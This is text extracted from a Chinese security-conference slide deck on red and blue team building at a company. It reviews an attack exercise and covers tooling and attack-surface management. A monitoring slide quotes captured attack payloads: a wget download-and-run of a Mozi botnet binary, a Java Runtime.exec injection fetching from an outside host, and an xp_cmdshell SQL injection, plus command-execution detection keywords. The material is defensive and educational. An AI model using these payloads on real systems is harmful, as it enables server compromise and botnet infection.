甲方安全视角下的红蓝建设-与非李骁.pptxVIP

2023携程信息安全沙龙李骁（与非）甲方安全视角下的红蓝建设

交大信安SRC，移动端安全反爬安全产品经理，SOC，APP风控基础安全x应用安全防御体系建设红蓝，磐石讲师介绍李骁（与非）

1磐石行动回顾2345目录CONTENTS磐石蓝队磐石红队红蓝建设的一些思考BAS平台化展望

磐石行动回顾内部影响力优秀蓝队，精英防守组安全团队内部态度设置为OKR（归类为活动保障）??????????对个人的提升激励????????加班值守??????其他部门态度职能部门感知（主动配合，意识宣贯）??????????业务部门感知（被钓鱼后）??????技术部门感知（参与度低）??自我定位运气：得分，排名；有没有攻击队打你实力：公司整体技术积累对安全的资源投入成正比

磐石蓝队准备工作子公司/非核心业务域名资产梳理WAF规则加固：通用型的命令执行特征、近期CVE、OA产品漏洞…专项告警蜜罐布置：站点，端口，github，求职…分工，SOP

磐石蓝队监控溯源思路常规扫描（SQLi，XSS，目录遍历）“量大”-抓到阿里云整个C段打近几年的CVEPoC：xstream，log4j2，Confluence，泛微OA…命令执行：wgetchmodbashwhoamipingnslookupdnslogbxss.me扫描边缘域名联动风控：抓到UID、DeviceID时间特征：活动启动、合法时间wget+http://*.*.*.*:53569/Mozi.m+-O+/tmp/netgear;sh+netgearcurpath=/currentsetting.htm=1$i18n.getClass().forName(\‘java.lang.Runtime\’).getMethod(\‘getRuntime\’,null).invoke(null,null).exec(\‘wgethttp://*.*.*.*:1114/i/9ca9b4/f6q1/x9g3/\).waitFor()9527\and\a\=\a\unionselectuserfromadmin;execxp_cmdshell\whoami\;--

磐石蓝队战果场外攻击队*2SpringbootHeapdump泄露内存信息Hostname、环境变量、mysql连接串…C2IP阿里云OSS域名，txt文件挑衅话术场内IP段（不容易证明）非法攻击：僵尸、钓鱼等白帽子测试（溯源到人，但不加分）

磐石红队参与背景2023：攻击队视角-防御加固打法准备工作规则解读：办公OA、大数据系统、敏感数据PoC积累：OA、网络设备、堡垒机、运维、项目管理工具资源：VPS、C2域名、sliver免杀、邮件托管常规：Nuclei，ARLEnscan：信息收集ICP、APP、小程序、公众号Yakit：单兵武器库，端口指纹、手工测试、反连管理Gophish：钓鱼自动化平台发现问题Github凭证搜集：企微CorpID、私钥、access_token-内部员工个人信息Github代码搜集：阿里云镜像地址-git凭证-.git文件-回退版本拿到内网项目代码任意文件读取，并发绕过云WAFSQL注入未授权，可初始化配置OA、CRM弱口令

红蓝建设的一些思考红蓝对抗-循序渐进

红蓝建设的一些思考红蓝对抗剧本设计形式是一场“秀”，目标是推动漏洞修复有一个员工账号，就可以拿下域控：设计拿员工账号的线路、设计从产线到办公网的线路优参与感强比日常漏洞修复提速拉齐对安全风险的认知劣模式固化，更卷规则而不是风险本身外部感知技术分享，网络安全周宣讲，钓鱼奖励，晋升答辩…理解红蓝-要求做专项红蓝

红蓝建设的一些思考攻击面管理资产管理域名、URL：SLB/CDN/公有云控制台，配置信息；内网域名爆破外网IP：HIDSagent/CMDB/CDN/公有云控制台；备机池重置流程不规范办公PC、服务器、容器：关注内网穿透（frp/向日葵/tv…），IPS流量检测/EDR进程检测端口基线网络边界白名单：UAT-Prod；办公-产线；WLAN之间；toInternet巡检黑名单：SSH，数据库/数据中间件，Web控制台识别未授权检测OfficeServerProdUATDEV/FATPCMobileProdUATPublicCloudIDCOfficeGuestStaff

红蓝建设的一些思考攻击面管理服务测绘端口：协议指纹，认证机制通用Web：title，footer，框架指纹，认证机制第三方测绘爬虫：管理卡OfficeServerProdUATDEV/FATPCMobile